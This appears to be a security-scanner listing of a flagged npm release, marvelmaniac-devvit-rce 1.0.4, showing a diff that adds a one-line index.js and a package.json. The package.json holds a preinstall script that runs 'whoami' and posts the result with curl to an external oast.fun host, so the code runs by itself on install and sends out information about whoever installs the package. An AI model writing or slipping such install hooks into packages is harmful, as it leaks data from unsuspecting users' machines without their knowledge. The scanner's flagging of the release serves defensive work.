marvelmaniac-devvit-rce 1.0.4

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of marvelmaniac-devvit-rce might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('Hacked');
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "marvelmaniac-devvit-rce",
3
+ "version": "1.0.4",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "whoami | curl -X POST -d @- https://ck1t8602vtc00001ttw0gjo7rdeyyyyyb.oast.fun/",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "lexi2",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "lodash": "^4.17.21"
14
+ }
15
+ }